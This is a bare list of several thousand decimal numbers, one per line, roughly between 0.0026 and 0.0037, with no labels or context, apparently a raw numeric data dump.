0.00365291
0.00364874
0.00366007
0.00365175
0.00365775
0.00365492
0.0036484
0.00362959
0.00363557
0.00363818
0.00362717
0.00363724
0.00363036
0.00362483
0.00362289
0.00361871
0.00362052
0.00362152
0.00362642
0.00361909
0.00361552
0.00362589
0.00362582
0.00362873
0.00362756
0.0036282
0.00362616
0.00362572
0.0036409
0.00364033
0.00364189
0.0036325
0.00364294
0.00364353
0.00363158
0.00363749
0.00363534
0.0036219
0.00362166
0.0036307
0.00362637
0.00363953
0.00363243
0.00363288
0.00363658
0.00363648
0.00362336
0.0036316
0.003614
0.00361864
0.00362338
0.00363349
0.00361964
0.0036213
0.00359622
0.00358418
0.00362963
0.00363574
0.00363826
0.00362717
0.00363732
0.0036304
0.00362489
0.00362286
0.00361873
0.00362049
0.00362166
0.00362641
0.00361912
0.00361542
0.00362576
0.00362569
0.00362816
0.00362757
0.00362802
0.00362586
0.0036256
0.00364111
0.00364031
0.00364195
0.00363242
0.00364317
0.00364381
0.00363156
0.0036376
0.00363555
0.00362181
0.00362208
0.0036309
0.0036269
0.00363951
0.00363227
0.00363299
0.00363667
0.00363627
0.00362351
0.00363128
0.00361468
0.00362344
0.00362464
0.00363328
0.00362326
0.00362204
0.00359515
0.00358189
0.00364347
0.00364563
0.0036417
0.00365011
0.00364139
0.00364844
0.00364674
0.00364265
0.0036372
0.00363916
0.00364111
0.00363862
0.00364035
0.00364388
0.00364337
0.00364556
0.00364166
0.00365005
0.00364131
0.00364834
0.0036467
0.00364261
0.00363717
0.00363914
0.00364114
0.00363858
0.00364034
0.00364388
0.00364336
0.00364551
0.00364162
0.00365002
0.00364128
0.00364832
0.00364664
0.00364253
0.0036371
0.00363908
0.00364102
0.00363852
0.00364023
0.00364379
0.0036434
0.00364555
0.00364165
0.00365004
0.00364131
0.00364837
0.00364667
0.00364256
0.00363711
0.0036391
0.00364104
0.00363854
0.00364025
0.00364382
0.00364352
0.00364567
0.00364173
0.00365014
0.00364142
0.0036485
0.00364676
0.00364267
0.00363721
0.00363918
0.00364113
0.00363864
0.00364037
0.0036439
0.00364337
0.00364548
0.00364158
0.00365
0.00364126
0.00364833
0.00364659
0.00364248
0.00363706
0.00363901
0.00364096
0.00363848
0.00364019
0.00364372
0.00364344
0.0036456
0.0036417
0.00365008
0.00364136
0.00364842
0.00364673
0.00364263
0.00363719
0.00363916
0.00364113
0.0036386
0.00364034
0.00364389
0.00364351
0.00364567
0.00364174
0.00365014
0.00364142
0.00364848
0.00364677
0.00364268
0.00363723
0.00363919
0.00364115
0.00363865
0.00364039
0.00364392
0.0036306
0.00363796
0.00362874
0.00363265
0.00363186
0.00362019
0.0036352
0.00363174
0.00363746
0.0036286
0.00363314
0.00363039
0.00362168
0.00363444
0.0036291
0.00362704
0.00363536
0.00363776
0.00363489
0.00362911
0.00362706
0.00363546
0.00363778
0.00363505
0.00363064
0.00363776
0.00362877
0.00363266
0.00363179
0.00362016
0.00363531
0.00362906
0.00362731
0.00363528
0.00363771
0.00363489
0.00362901
0.00362731
0.00363522
0.00363767
0.00363482
0.00363154
0.00363887
0.00362894
0.00363326
0.00363035
0.0036184
0.00363496
0.00363107
0.00363903
0.00362886
0.00363295
0.00363063
0.0036193
0.00363577
0.0036291
0.00362699
0.00363544
0.00363774
0.00363508
0.00362895
0.003627
0.00363529
0.00363765
0.00363477
0.0036313
0.00363864
0.00362904
0.00363305
0.00363093
0.00361843
0.00363593
0.00362913
0.00362704
0.00363552
0.00363784
0.00363513
0.00362924
0.0036272
0.00363546
0.00363785
0.00363505
0.00363145
0.00363835
0.00362861
0.00363257
0.00362924
0.00361953
0.00363441
0.00363084
0.00363831
0.00362901
0.00363287
0.00363167
0.00361999
0.00363564
0.00364923
0.00364263
0.00365272
0.00364301
0.003642
0.00365004
0.00365181
0.0036486
0.00364107
0.00364238
0.00365048
0.00364135
0.0036509
0.00364814
0.00364942
0.00364282
0.00365295
0.00364317
0.00364216
0.00365025
0.00365199
0.00364875
0.00364118
0.0036425
0.00365068
0.00364148
0.00365107
0.00364832
0.00364923
0.0036426
0.00364299
0.00365269
0.00364199
0.00365001
0.00365179
0.00364862
0.0036411
0.00364238
0.00365056
0.00364136
0.00364825
0.00365091
0.00364931
0.00364267
0.00364306
0.00365279
0.00364205
0.00365009
0.00365189
0.00364867
0.00364114
0.00364244
0.00365059
0.00364141
0.00364822
0.00365099
0.0036492
0.0036426
0.00365268
0.00364297
0.00364197
0.00365
0.00365176
0.00364857
0.00364105
0.00364233
0.00365051
0.00364132
0.00365087
0.00364818
0.00364912
0.0036425
0.0036429
0.00365255
0.0036419
0.00364989
0.00365168
0.00364854
0.00364104
0.0036423
0.00365051
0.00364129
0.00364821
0.00365082
0.00364923
0.00364262
0.00365267
0.003643
0.00364199
0.00365001
0.00365179
0.00364863
0.00364109
0.00364238
0.00365057
0.00364136
0.00365093
0.00364822
0.00364931
0.00364269
0.00364307
0.00365284
0.00364205
0.00365013
0.00365189
0.00364864
0.00364109
0.00364241
0.00365052
0.00364139
0.00364816
0.00365096
0.00364451
0.00365098
0.00364939
0.00364446
0.00364752
0.00364264
0.00364271
0.00364263
0.00364678
0.00364411
0.0036402
0.00363919
0.003639
0.00364065
0.00364464
0.00365118
0.00364973
0.00364458
0.00364786
0.00364284
0.00364291
0.00364309
0.00364731
0.00364463
0.0036405
0.00363948
0.00363929
0.00364094
0.00364439
0.00365087
0.0036493
0.00364435
0.00364742
0.00364254
0.00364261
0.00364217
0.00364675
0.00364411
0.00364013
0.00363902
0.00363878
0.00364055
0.00364441
0.00365085
0.00364931
0.00364435
0.00364738
0.00364252
0.00364261
0.00364205
0.00364674
0.00364402
0.00364008
0.00363898
0.00363872
0.00364052
0.00364455
0.00365104
0.00364948
0.0036445
0.00364762
0.00364271
0.00364277
0.0036427
0.00364694
0.00364428
0.00364029
0.00363925
0.00363906
0.00364073
0.00364433
0.00365085
0.00364928
0.00364431
0.00364752
0.00364258
0.0036426
0.00364272
0.00364685
0.00364451
0.00364031
0.0036391
0.00363903
0.00364059
0.00364459
0.00365109
0.00364969
0.00364453
0.00364785
0.00364279
0.00364286
0.00364296
0.00364739
0.00364481
0.00364044
0.00363936
0.00363915
0.00364087
0.00364458
0.00365111
0.00364959
0.00364454
0.00364776
0.00364278
0.00364283
0.00364275
0.00364716
0.00364452
0.00364038
0.0036393
0.00363908
0.0036408
0.00362422
0.00362491
0.00362801
0.00363599
0.00362416
0.00362488
0.00362793
0.00363584
0.00364246
0.00364246
0.00363964
0.00364187
0.0036411
0.00364111
0.00364129
0.00363232
0.0036255
0.00362395
0.00362302
0.00363448
0.00362597
0.00362433
0.00362371
0.00362373
0.0036249
0.00362792
0.00363549
0.00364248
0.00364247
0.00363973
0.0036419
0.00364117
0.00364117
0.00364134
0.0036244
0.00362502
0.0036281
0.00363602
0.00362887
0.00362298
0.00362134
0.00361955
0.00363265
0.00362573
0.00362429
0.00362369
0.00363413
0.00362571
0.00362399
0.00362354
0.00363244
0.00362602
0.00362477
0.0036236
0.00362401
0.00362476
0.00362797
0.00363599
0.00364238
0.00364238
0.00363958
0.00364178
0.00364101
0.00364099
0.0036412
0.00362408
0.00362492
0.00362791
0.00363586
0.0036324
0.0036262
0.00362474
0.00362372
0.00363338
0.003626
0.0036247
0.00362432
0.00364251
0.0036425
0.00363963
0.00364191
0.00364113
0.00364114
0.00364133
0.00362412
0.00362484
0.00362799
0.00363604
0.00362408
0.00362486
0.00362801
0.00363598
0.00364129
0.0036409
0.00364021
0.00363769
0.00363755
0.00363689
0.00363674
0.00364168
0.00364122
0.00364054
0.00363796
0.00363784
0.00363714
0.00363696
0.00364107
0.00364079
0.00364008
0.00363755
0.00363742
0.0036368
0.00363665
0.00364095
0.00364074
0.00364004
0.00363751
0.00363736
0.00363678
0.00363663
0.00364133
0.00364091
0.00364022
0.00363772
0.00363758
0.00363689
0.00363674
0.00364129
0.00364072
0.00364011
0.00363757
0.00363751
0.00363679
0.0036366
0.00364138
0.00364102
0.00364034
0.00363777
0.00363764
0.00363697
0.0036368
0.00364127
0.00364092
0.00364025
0.00363773
0.00363758
0.00363692
0.00363676
0.00363204
0.00361388
0.00361461
0.00362138
0.0036128
0.00361825
0.00362091
0.00363273
0.00361408
0.00361463
0.00362177
0.00361331
0.00361805
0.00362125
0.00362004
0.0036209
0.0036199
0.00361551
0.0036243
0.00361713
0.00361797
0.00361998
0.00362082
0.00361984
0.00361547
0.00362421
0.00361708
0.0036179
0.0036171
0.00361338
0.00361339
0.00361021
0.0036128
0.00361622
0.00361354
0.00360208
0.00358418
0.00359331
0.00359871
0.0036037
0.00360117
0.00359793
0.0036171
0.00361338
0.00361339
0.00361019
0.00361622
0.00361279
0.00361351
0.00360215
0.0035932
0.00359873
0.00358415
0.00360371
0.00360121
0.00359804
0.00360985
0.00361563
0.00360905
0.00361117
0.003612
0.003613
0.00360755
0.00360988
0.00361527
0.00361224
0.00360919
0.0036126
0.00360782
0.00361197
0.00363229
0.00361442
0.00362195
0.00361475
0.00362152
0.00361303
0.00361856
0.00362
0.00362085
0.00361548
0.00361987
0.00361793
0.00362426
0.0036171
0.00362003
0.00362091
0.0036199
0.00361551
0.0036243
0.00361712
0.00361797
0.00363176
0.00361384
0.00361446
0.00362131
0.00361808
0.00361267
0.00362077
0.00361679
0.00361332
0.00361016
0.00361337
0.00361275
0.0036134
0.00361611
0.00360227
0.00358443
0.00360041
0.00359364
0.00360424
0.00359844
0.00360124
0.00360985
0.00361526
0.00360916
0.00361221
0.00361195
0.00361257
0.00360779
0.00361705
0.00361336
0.00361338
0.00361022
0.00361616
0.0036128
0.00361352
0.00360228
0.00359332
0.00359876
0.00358421
0.00360392
0.00360124
0.00359813
0.00360988
0.0036153
0.00361225
0.0036092
0.00361261
0.00360782
0.00361198
0.00360986
0.00361566
0.00360906
0.00361118
0.00361201
0.00360756
0.00361302
0.00361708
0.00361336
0.00361021
0.0036134
0.00361352
0.00361281
0.0036162
0.00360221
0.0035987
0.00359321
0.00358425
0.00360375
0.00359805
0.00360118
0.00360988
0.00361566
0.00361123
0.00360911
0.0036076
0.00361303
0.00361202
0.00361708
0.00361335
0.00361341
0.0036102
0.00361619
0.0036135
0.00361282
0.00360232
0.00359328
0.00359833
0.0035841
0.00360396
0.00360113
0.00359787
0.00363273
0.00361389
0.00362203
0.0036149
0.00362123
0.00361354
0.00361805
0.00362001
0.00362086
0.00361548
0.00361986
0.00361794
0.00362426
0.00361709
0.00362001
0.00362087
0.00361987
0.00361549
0.00362427
0.0036171
0.00361794
0.0036325
0.00361429
0.00361466
0.0036219
0.00361829
0.00361322
0.00362133
0.0036099
0.00361529
0.0036092
0.00361225
0.00361199
0.00360783
0.00361262
0.00360986
0.00361568
0.00361114
0.00360908
0.00360755
0.00361303
0.00361203
0.00361718
0.00361343
0.00361026
0.00361348
0.00361358
0.00361289
0.00361629
0.00360221
0.00359867
0.00359335
0.00358413
0.00360382
0.003598
0.00360116
0.00361715
0.00361343
0.00361025
0.00361347
0.00361356
0.00361628
0.00361287
0.00360211
0.0035988
0.0035933
0.00358429
0.00360377
0.00359801
0.00360116
0.00362001
0.00362087
0.00361987
0.00361549
0.00362427
0.00361794
0.0036171
0.00362005
0.00362092
0.00361991
0.00361552
0.00362433
0.00361798
0.00361712
0.00363253
0.00361334
0.00362138
0.00361442
0.00362057
0.0036177
0.00361326
0.00363198
0.00361375
0.00362129
0.0036144
0.00362064
0.00361793
0.00361291
0.0035893
0.00358854
0.00358238
0.00358205
0.00359146
0.00358706
0.00358229
0.0035893
0.00358854
0.00358239
0.00358205
0.00359147
0.00358706
0.0035823
0.00358931
0.00358855
0.0035824
0.00358205
0.00359147
0.00358707
0.00358231
0.00358931
0.00358855
0.00358205
0.0035824
0.00358707
0.00359147
0.0035823
0.0035893
0.00358854
0.00358238
0.00358205
0.00358229
0.00359146
0.00358706
0.00358931
0.00358855
0.00358206
0.00358239
0.00358707
0.00359146
0.00358231
0.00358931
0.00358855
0.00358206
0.0035824
0.00358231
0.00358707
0.00359147
0.0035893
0.00358854
0.00358205
0.00358238
0.00358707
0.00359146
0.0035823
0.0026225
0.0026225
0.0026225
0.00262437
0.00263066
0.00263246
0.00263246
0.00263066
0.00263246
0.00263246
0.00263246
0.00263246
0.00263066
0.00263246
0.00263246
0.00263066
0.00262437
0.00259094
0.0026225
0.0026225
0.00259272
0.00259271
0.00262437
0.00259093
0.0026225
0.0026225
0.00259271
0.00259271
0.0026225
0.00259271
0.00259271
0.00262437
0.00259093
0.0026225
0.00259271
0.00259271
0.00259093
0.00264993
0.00263246
0.00263246
0.00263246
0.00263246
0.00264978
0.00265243
0.00265002
0.00261007
0.00262467
0.00262475
0.00260996
0.00262465
0.00260993
0.00261007
0.00262467
0.00262475
0.00260996
0.0026225
0.0026225
0.0026225
0.00259272
0.00259271
0.00259271
0.00259271
0.00261036
0.00262466
0.0026225
0.00261256
0.00262473
0.00261016
0.00261256
0.00262465
0.00260993
0.00261037
0.0026225
0.00262466
0.00261256
0.00262473
0.00261256
0.00261016
0.0026247
0.0026247
0.00261076
0.00261
0.00261
0.00262982
0.00264459
0.00262982
0.00264459
0.00264431
0.0026299
0.0026299
0.00264464
0.00264464
0.00264469
0.00262986
0.00264461
0.00262997
0.00264469
0.00262986
0.00264461
0.00262997
0.00264468
0.00264244
0.00263005
0.00263246
0.0026446
0.00264244
0.00263026
0.00264468
0.00264244
0.00263006
0.00263246
0.0026446
0.00264244
0.00263026
0.00262982
0.00264459
0.00264431
0.0026299
0.0026299
0.00264464
0.00264464
0.00262982
0.00264459
0.00265023
0.00265243
0.00264993
0.00264982
0.00265023
0.00265243
0.00265243
0.00265002
0.00264469
0.00262986
0.00264461
0.00262997
0.00264468
0.00264244
0.00263006
0.00263246
0.00264461
0.00264244
0.00263026
0.00264469
0.00262986
0.00264461
0.00262997
0.00264468
0.00264244
0.00263246
0.00263006
0.00264244
0.00264461
0.00263026
0.00264468
0.00264244
0.00263006
0.00263246
0.0026446
0.00264244
0.00263026
0.00264469
0.00262986
0.00264461
0.00262997
0.00264468
0.00264244
0.00263246
0.00263005
0.00264244
0.00264461
0.00263026
0.00264469
0.00262986
0.00264461
0.00262997
0.00265061
0.00264986
0.00264986
0.00264978
0.00262982
0.00264459
0.00264431
0.0026299
0.0026299
0.00264464
0.00264464
0.00262982
0.00264459
0.00264982
0.00264468
0.00264244
0.00263246
0.00263005
0.00264244
0.00264461
0.00263026
0.00264468
0.00264244
0.00263246
0.00263006
0.00264244
0.00264461
0.00263026
0.00264469
0.00262986
0.00264461
0.00262997
0.00264469
0.00262986
0.00264461
0.00262997
0.00264431
0.00262989
0.0026299
0.00264464
0.00264464
0.00262982
0.00264459
0.00262982
0.00264459
0.00262465
0.00260992
0.00262465
0.00260993
0.0026247
0.0026247
0.00261076
0.00261
0.00261
0.00259009
0.00260477
0.00259009
0.00260477
0.00260449
0.00259016
0.00259016
0.00260482
0.00260482
0.00261007
0.00262467
0.00262475
0.00260996
0.00261036
0.00262466
0.0026225
0.00261256
0.00262473
0.00261015
0.00261256
0.00261036
0.00262466
0.0026225
0.00261256
0.00262473
0.00261016
0.00261256
0.00260487
0.00259013
0.00260479
0.00259023
0.00260487
0.00259013
0.00260479
0.00259023
0.00260485
0.00260263
0.00259031
0.00259271
0.00260478
0.00260263
0.00259052
0.00260485
0.00260263
0.00259032
0.00259271
0.00260478
0.00260263
0.00259052
0.0026247
0.0026247
0.00261076
0.00261
0.00261
0.00262465
0.00260992
0.00259009
0.00260477
0.00260449
0.00259016
0.00259016
0.00260482
0.00260482
0.00259009
0.00260477
0.00261036
0.00262466
0.0026225
0.00261256
0.00262473
0.00261016
0.00261256
0.00261007
0.00262467
0.00262475
0.00260996
0.00261036
0.0026225
0.00262466
0.00261256
0.00262473
0.00261256
0.00261016
0.00260487
0.00259013
0.0026048
0.00259023
0.00260485
0.00260263
0.00259032
0.00259271
0.00260479
0.00260263
0.00259053
0.00260487
0.00259013
0.0026048
0.00259023
0.00260485
0.00260263
0.00259271
0.00259032
0.00260263
0.00260478
0.00259053
0.00261007
0.00262467
0.00262475
0.00260996
0.00261036
0.0026225
0.00262466
0.00261256
0.00262473
0.00261256
0.00261015
0.00261007
0.00262467
0.00262475
0.00260996
0.00260485
0.00260263
0.00259032
0.00259271
0.00260478
0.00260263
0.00259053
0.00260487
0.00259013
0.00260479
0.00259023
0.00260485
0.00260263
0.00259271
0.00259032
0.00260263
0.00260478
0.00259052
0.00260487
0.00259013
0.00260479
0.00259023
0.0026247
0.0026247
0.00261076
0.00261
0.00261
0.00262465
0.00260993
0.00259009
0.00260477
0.00260449
0.00259016
0.00259016
0.00260482
0.00260482
0.00259009
0.00260477
0.00261036
0.0026225
0.00262466
0.00261256
0.00262473
0.00261256
0.00261016
0.00261007
0.00262467
0.00262475
0.00260996
0.00261007
0.00262467
0.00262475
0.00260996
0.00260485
0.00260263
0.00259271
0.00259032
0.00260263
0.00260478
0.00259053
0.00260485
0.00260263
0.00259271
0.00259032
0.00260263
0.00260478
0.00259053
0.00260487
0.00259013
0.00260479
0.00259023
0.00260487
0.00259013
0.0026048
0.00259023
0.00262465
0.00260993
0.00262465
0.00260993
0.00260449
0.00259016
0.00259016
0.00260482
0.00260482
0.00259009
0.00260477
0.00259009
0.00260477
0.00265461
0.00265469
0.0026499
0.0026498
0.00265467
0.00265461
0.0026498
0.00265459
0.00264984
0.00265465
0.00264978
0.00265458
0.00261473
0.0026148
0.00260995
0.00261004
0.00261473
0.00261478
0.00260995
0.00261987
0.00262472
0.0026199
0.00262466
0.00261992
0.00261988
0.00262001
0.00262468
0.00262473
0.00262468
0.00261989
0.00261998
0.00261472
0.00260998
0.00261472
0.00261477
0.00260993
0.00261987
0.0026147
0.00261473
0.0026148
0.00261004
0.00260995
0.00261478
0.00261473
0.00260995
0.00261987
0.00262472
0.0026199
0.00262466
0.00261992
0.00261989
0.00262001
0.00262473
0.00262468
0.00262468
0.00261998
0.00261989
0.00261472
0.00260998
0.00261473
0.00261477
0.00260993
0.00261986
0.0026147
0.00261476
0.00260989
0.00260989
0.00261469
0.00261469
0.00260995
0.00262002
0.00262474
0.00262464
0.00261994
0.0026247
0.00262011
0.00261989
0.00262002
0.00262474
0.00262464
0.00261994
0.0026247
0.00262011
0.00261989
0.00261989
0.00262463
0.00262463
0.0026247
0.00261983
0.00261983
0.00261475
0.00260995
0.00261475
0.00261017
0.00261479
0.0026147
0.00261007
0.00261475
0.00260995
0.00261475
0.00261017
0.00261479
0.0026147
0.00261007
0.00263461
0.00263979
0.00263461
0.00263979
0.00263982
0.00264457
0.00264457
0.00264464
0.00263975
0.00263975
0.00263467
0.00263007
0.00263466
0.00262985
0.00263461
0.0026347
0.00262997
0.00263467
0.00263007
0.00263466
0.00262985
0.00263461
0.0026347
0.00262997
0.00263994
0.00264458
0.00264468
0.00263987
0.00264464
0.00263982
0.00264004
0.00263995
0.00264458
0.00264468
0.00263987
0.00264464
0.00263982
0.00264004
0.00263467
0.00262978
0.00262978
0.00263459
0.00263459
0.00262985
0.00263981
0.00264462
0.00264467
0.00263994
0.00264461
0.00263982
0.00263991
0.00263462
0.00263463
0.00262988
0.00262982
0.00263468
0.00263979
0.00264466
0.00263983
0.0026446
0.00263985
0.00263464
0.00263471
0.00262985
0.00262994
0.00262984
0.00263464
0.00263469
0.00263981
0.00264462
0.00264467
0.00263994
0.00264462
0.00263982
0.00263991
0.00263462
0.00263464
0.00262988
0.00263468
0.00262982
0.00263979
0.00264466
0.00263983
0.0026446
0.00263985
0.00263464
0.00263471
0.00262985
0.00262994
0.00263464
0.00263469
0.00262984
0.00263461
0.00263979
0.00263982
0.00264457
0.00264457
0.00264464
0.00263975
0.00263975
0.00263467
0.00263007
0.00263466
0.00262985
0.0026347
0.00263461
0.00262997
0.00263467
0.00263007
0.00263466
0.00262985
0.00263461
0.0026347
0.00262997
0.00263995
0.00264458
0.00264468
0.00263987
0.00264004
0.00264464
0.00263982
0.00263994
0.00264458
0.00264468
0.00263987
0.00264464
0.00263982
0.00264004
0.00263467
0.00262978
0.00262978
0.00263459
0.00263459
0.00262985
0.00263461
0.00263979
0.00265461
0.00265469
0.0026498
0.0026499
0.00265461
0.00265467
0.0026498
0.00265459
0.00264984
0.00265461
0.00265465
0.00264978
0.00263981
0.00264467
0.00264462
0.00263994
0.00264462
0.00263991
0.00263982
0.00263462
0.00263464
0.00262988
0.00262983
0.00263468
0.00263979
0.00264466
0.00263983
0.0026446
0.00263985
0.00263464
0.00263471
0.00262994
0.00262985
0.00262984
0.00263469
0.00263464
0.00263981
0.00264462
0.00264467
0.00263994
0.00264462
0.00263982
0.00263991
0.00263462
0.00263464
0.00262988
0.00263468
0.00262982
0.0026398
0.00264466
0.00263983
0.0026446
0.00263985
0.00263464
0.00263471
0.00262985
0.00262994
0.00263464
0.00263469
0.00262984
0.00263981
0.00264467
0.00264462
0.00263994
0.00264461
0.00263991
0.00263982
0.00263462
0.00263463
0.00262988
0.00263468
0.00262982
0.00263979
0.00264466
0.00263983
0.0026446
0.00263985
0.00263464
0.00263471
0.00262994
0.00262985
0.00263469
0.00263464
0.00262984
0.00263981
0.00264462
0.00264467
0.00263994
0.00264461
0.00263982
0.00263991
0.00263462
0.00263463
0.00262988
0.00263468
0.00262982
0.00263979
0.00264466
0.00263983
0.0026446
0.00263985
0.00263464
0.00263471
0.00262985
0.00262994
0.00263464
0.00263469
0.00262984
0.00265464
0.00264974
0.00264974
0.00265456
0.00265456
0.00264981
0.00265464
0.00264981
0.00265464
0.00265003
0.00265458
0.00265468
0.00264994
0.00265464
0.00264981
0.00265464
0.00265003
0.00265468
0.00265458
0.00264994
0.00265458
0.00263461
0.00263979
0.00263982
0.00264457
0.00264457
0.00264464
0.00263975
0.00263975
0.00263467
0.00263007
0.00263466
0.00262985
0.0026347
0.00263461
0.00262997
0.00263467
0.00263007
0.00263466
0.00262985
0.00263461
0.0026347
0.00262997
0.00263995
0.00264458
0.00264468
0.00263987
0.00264004
0.00264465
0.00263982
0.00263995
0.00264458
0.00264468
0.00263987
0.00264465
0.00263982
0.00264004
0.00263467
0.00262978
0.00262978
0.00263459
0.00263459
0.00262985
0.00263461
0.00263979
0.00265459
0.00264984
0.00265461
0.00265465
0.00264978
0.00263981
0.00264467
0.00264462
0.00263994
0.00264462
0.00263991
0.00263982
0.00263462
0.00263464
0.00262988
0.00263468
0.00262982
0.00263979
0.00264466
0.00263983
0.0026446
0.00263985
0.00263464
0.00263471
0.00262994
0.00262985
0.00263469
0.00263464
0.00262984
0.00263981
0.00264467
0.00264462
0.00263994
0.00264462
0.00263991
0.00263982
0.00263462
0.00263463
0.00262988
0.00263468
0.00262982
0.00263979
0.00264466
0.00263983
0.0026446
0.00263985
0.00263464
0.00263471
0.00262994
0.00262985
0.00263469
0.00263464
0.00262984
0.00263982
0.00264457
0.00264457
0.00264464
0.00263975
0.00263975
0.00263467
0.00263007
0.00263466
0.00262985
0.00262997
0.0026347
0.00263461
0.00263467
0.00263007
0.00263466
0.00262985
0.00262997
0.0026347
0.00263461
0.00263994
0.00264458
0.00264468
0.00263987
0.00264464
0.00264004
0.00263982
0.00263994
0.00264458
0.00264468
0.00263987
0.00264464
0.00264004
0.00263982
0.00263467
0.00262978
0.00262978
0.00262985
0.00263459
0.00263459
0.00263461
0.00263979
0.00263461
0.00263979
0.00261986
0.0026147
0.00261987
0.0026147
0.00261476
0.00260989
0.00260989
0.00261469
0.00261469
0.00260995
0.00262002
0.00262474
0.00262464
0.00261994
0.0026247
0.00261989
0.00262011
0.00262002
0.00262474
0.00262464
0.00261994
0.0026247
0.00261989
0.00262011
0.00261989
0.00262463
0.00262463
0.0026247
0.00261983
0.00261983
0.00261476
0.00260995
0.00261475
0.00261017
0.0026147
0.00261007
0.00261479
0.00261475
0.00260995
0.00261475
0.00261017
0.0026147
0.00261008
0.00261479
0.00259486
0.0026
0.00259486
0.0026
0.00260002
0.00260476
0.00260476
0.00260482
0.00259996
0.00259996
0.0025949
0.00259033
0.0025949
0.00259011
0.00259485
0.00259494
0.00259022
0.0025949
0.00259034
0.0025949
0.00259012
0.00259485
0.00259494
0.00259023
0.00260014
0.00260477
0.00260486
0.00260007
0.00260482
0.00260003
0.00260024
0.00260015
0.00260477
0.00260486
0.00260007
0.00260482
0.00260003
0.00260025
0.0025949
0.00259005
0.00259006
0.00259484
0.00259484
0.00259011
0.00261473
0.0026148
0.00260995
0.00261004
0.00261473
0.00261478
0.00260995
0.00261987
0.00262472
0.0026199
0.00262466
0.00261992
0.00261989
0.00262001
0.00262468
0.00262473
0.00261989
0.00262468
0.00261998
0.00261472
0.00260998
0.00261473
0.00261477
0.00260993
0.00260002
0.0026048
0.00260485
0.00260014
0.0026048
0.00260003
0.00260011
0.00259487
0.00259488
0.00259015
0.00259492
0.0025901
0.00260001
0.00260484
0.00260004
0.00260479
0.00260006
0.00259489
0.00259495
0.00259012
0.0025902
0.00259489
0.00259493
0.00259011
0.00260002
0.0026048
0.00260485
0.00260014
0.0026048
0.00260003
0.00260011
0.00259487
0.00259488
0.00259015
0.00259492
0.0025901
0.00260001
0.00260484
0.00260004
0.00260479
0.00260006
0.00259489
0.00259495
0.00259012
0.0025902
0.00259489
0.00259493
0.00259011
0.00261476
0.00260989
0.00260989
0.00261469
0.00261469
0.00260995
0.00262002
0.00262474
0.00262464
0.00261994
0.00261989
0.0026247
0.00262011
0.00262002
0.00262474
0.00262464
0.00261994
0.00262011
0.0026247
0.00261989
0.00261989
0.00262463
0.00262463
0.00261983
0.0026247
0.00261983
0.00261476
0.00260995
0.00261475
0.00261017
0.0026147
0.00261479
0.00261008
0.00261476
0.00260995
0.00261475
0.00261017
0.00261479
0.0026147
0.00261007
0.00261986
0.0026147
0.00259486
0.0026
0.00260003
0.00260476
0.00260476
0.00260483
0.00259997
0.00259997
0.00259491
0.00259033
0.0025949
0.00259012
0.00259494
0.00259485
0.00259024
0.00259491
0.00259033
0.0025949
0.00259012
0.00259485
0.00259494
0.00259024
0.00260015
0.00260477
0.00260486
0.00260007
0.00260024
0.00260482
0.00260003
0.00260015
0.00260477
0.00260486
0.00260007
0.00260482
0.00260003
0.00260024
0.00259491
0.00259006
0.00259006
0.00259484
0.00259484
0.00259012
0.00259486
0.0026
0.00261473
0.0026148
0.00260995
0.00261004
0.00261473
0.00261478
0.00260995
0.00261987
0.00262472
0.0026199
0.00262466
0.00261992
0.00261989
0.00262001
0.00262468
0.00262473
0.00261989
0.00262468
0.00261998
0.00261472
0.00260998
0.00261473
0.00261477
0.00260993
0.00260002
0.00260485
0.0026048
0.00260014
0.0026048
0.00260011
0.00260003
0.00259487
0.00259488
0.00259015
0.00259492
0.0025901
0.00260001
0.00260484
0.00260004
0.00260479
0.00260006
0.00259489
0.00259495
0.0025902
0.00259012
0.00259494
0.00259489
0.00259011
0.00260002
0.0026048
0.00260485
0.00260014
0.0026048
0.00260003
0.00260011
0.00259487
0.00259488
0.00259015
0.00259492
0.0025901
0.00260001
0.00260484
0.00260004
0.00260479
0.00260006
0.00259489
0.00259495
0.00259012
0.0025902
0.00259489
0.00259494
0.00259011
0.00261473
0.0026148
0.00261004
0.00260995
0.00261478
0.00261473
0.00260995
0.00261987
0.00262472
0.0026199
0.00261992
0.00262466
0.00261988
0.00262001
0.00262473
0.00262468
0.00261998
0.00262468
0.00261989
0.00261472
0.00260998
0.00261473
0.00261477
0.00260993
0.00261473
0.0026148
0.00260995
0.00261004
0.00261473
0.00261478
0.00260995
0.00261987
0.00262472
0.0026199
0.00262466
0.00261992
0.00261989
0.00262001
0.00262468
0.00262473
0.00262468
0.00261989
0.00261998
0.00261472
0.00260998
0.00261473
0.00261477
0.00260993
0.00260002
0.00260485
0.0026048
0.00260014
0.0026048
0.00260011
0.00260003
0.00259487
0.00259488
0.00259015
0.00259492
0.0025901
0.00260001
0.00260484
0.00260004
0.00260479
0.00260006
0.00259489
0.00259495
0.0025902
0.00259012
0.00259493
0.00259489
0.00259011
0.00260002
0.0026048
0.00260485
0.00260014
0.0026048
0.00260003
0.00260011
0.00259487
0.00259488
0.00259015
0.00259492
0.0025901
0.00260001
0.00260484
0.00260004
0.00260479
0.00260006
0.00259489
0.00259495
0.00259012
0.0025902
0.00259489
0.00259493
0.00259011
0.00261476
0.00260989
0.00260989
0.00261469
0.00261469
0.00260995
0.00262002
0.00262474
0.00262464
0.00261994
0.00261989
0.0026247
0.00262011
0.00262002
0.00262474
0.00262465
0.00261994
0.00262011
0.0026247
0.00261989
0.00261989
0.00262463
0.00262463
0.00261983
0.0026247
0.00261983
0.00261476
0.00260995
0.00261475
0.00261017
0.0026147
0.00261479
0.00261008
0.00261476
0.00260995
0.00261475
0.00261017
0.00261479
0.0026147
0.00261008
0.00261987
0.0026147
0.00259486
0.0026
0.00260003
0.00260476
0.00260476
0.00260483
0.00259997
0.00259997
0.00259491
0.00259033
0.0025949
0.00259012
0.00259494
0.00259485
0.00259024
0.00259491
0.00259033
0.0025949
0.00259012
0.00259485
0.00259494
0.00259024
0.00260015
0.00260477
0.00260486
0.00260007
0.00260024
0.00260482
0.00260003
0.00260015
0.00260477
0.00260486
0.00260007
0.00260482
0.00260003
0.00260024
0.00259491
0.00259006
0.00259006
0.00259484
0.00259484
0.00259012
0.00259486
0.0026
0.00261473
0.0026148
0.00261004
0.00260995
0.00261478
0.00261473
0.00260995
0.00261987
0.00262472
0.0026199
0.00261992
0.00262466
0.00261989
0.00262001
0.00262473
0.00262468
0.00261998
0.00262468
0.00261989
0.00261472
0.00260998
0.00261473
0.00261477
0.00260993
0.00261473
0.0026148
0.00261004
0.00260995
0.00261478
0.00261473
0.00260995
0.00261987
0.00262472
0.0026199
0.00262466
0.00261992
